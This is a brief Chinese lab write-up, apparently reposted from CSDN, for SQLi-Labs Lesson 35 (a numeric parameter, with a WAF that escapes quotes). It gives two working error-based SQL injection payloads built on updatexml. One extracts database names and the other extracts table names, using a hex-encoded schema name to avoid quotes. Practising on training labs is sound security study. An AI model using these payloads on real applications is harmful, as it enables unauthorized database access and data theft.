SQLi LABS Less-35

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第三十五关注入点为 数值型 , 注入方式为 报错注入

此关卡通过 代码WAF 转义了单引号' , 我们使用 编译 绕过WAF , 先上结果

?id=1 and updatexml(1,concat(0x7e,
substr((select group_concat(schema_name)
from information_schema.schemata),62,31)
),3)

img

 

?id=1 and updatexml(1,concat(0x7e,
substr((select group_concat(table_name)
from information_schema.tables
where table_schema=0x7365637572697479),1,31)
),3)

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118312453
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复